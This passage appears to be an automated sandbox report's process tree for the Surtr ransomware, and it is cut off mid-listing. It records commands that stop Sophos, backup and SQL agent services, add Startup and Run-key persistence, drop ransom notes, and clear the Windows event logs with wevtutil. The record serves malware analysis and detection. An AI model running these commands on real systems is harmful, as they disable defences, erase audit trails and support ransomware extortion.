C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SMTPSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SNAC"3⤵
-
C:\Windows\system32\net.exenet stop "SNAC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SNAC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SntpService"3⤵
-
C:\Windows\system32\net.exenet stop "SntpService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SntpService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"3⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "sophossps"3⤵
-
C:\Windows\system32\net.exenet stop "sophossps"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "sophossps"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$BKUPEXEC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$ECWDB2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$ECWDB2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$PRACTTICEBGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Private_DATA.surt" "%USERPROFILE%\Desktop\Private_DATA.surt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\ID_DATA.surt" "%USERPROFILE%\Desktop\ID_DATA.surt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\SURTR_README.hta" "%USERPROFILE%\Desktop\SURTR_README.hta"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Service\SURTR_README.txt" "%USERPROFILE%\Desktop\SURTR_README.txt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$PROFXENGAGEMENT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe el4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe el5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Analytic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Application"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DebugChannel"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowFilterGraph"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowPluginControl"4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Els_Hyphenation/Analytic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "EndpointMapper"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "ForwardedEvents"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "HardwareEvents"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Internet Explorer"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Key Management Service"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MF_MediaFoundationDeviceProxy"4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Media Center"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationDeviceProxy"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPerformance"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPipeline"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPlatform"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IE/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ADSI/Debug"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/General"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppID/Operational"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audit/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Backup"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CDROM/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Calculator/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Logging"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXP/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Disk/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Documents/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EFS/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Debug"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Analytic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HAL/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Help/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HttpService/Trace"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IKE/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-International/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"4⤵
-
